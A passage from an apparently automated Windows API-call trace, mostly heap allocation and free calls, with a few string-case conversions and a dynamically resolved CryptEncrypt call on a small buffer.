lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0248.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0248.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0248.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0248.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0248.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0248.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0248.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0248.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0248.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0248.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0248.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0248.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0248.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0248.316] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0248.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0248.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0248.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0248.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0248.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0248.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0248.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0248.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0248.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0248.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0248.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0248.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0248.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0248.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0248.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0248.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0248.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2bb8 [0248.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0248.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0248.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0248.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1798 [0248.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0248.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0248.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0248.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0248.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0248.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0248.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0248.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0248.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.318] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0248.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0248.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0248.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0248.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0248.318] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0248.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0248.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3e8 [0248.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0248.318] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0248.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0248.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.319] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0248.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0248.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0248.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0248.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0248.319] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0248.319] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0248.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0248.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0248.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0248.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0248.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0248.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0248.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0248.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0248.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0248.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0248.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0248.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0248.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0248.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0248.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0248.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0248.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0248.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0248.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0248.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0248.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0248.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0248.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0248.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.323] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0248.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0248.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0248.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0248.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0248.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0248.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0248.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0248.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0248.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0248.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0248.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0248.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0248.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0248.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0248.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0248.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0248.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0248.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa7f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0248.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.325] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0248.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0248.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0248.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6cb0 [0248.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0248.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0248.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0248.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0248.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0248.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0248.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0248.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0248.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0248.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0248.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0248.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0248.326] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b1c28*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b1c28*, pdwDataLen=0x8bef68*=0x8) returned 1 [0248.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0248.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0248.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0248.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0248.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0248.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0248.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0248.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0248.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0248.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0248.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0248.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0248.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0248.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0248.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0248.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0248.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0248.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0248.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0248.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0248.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 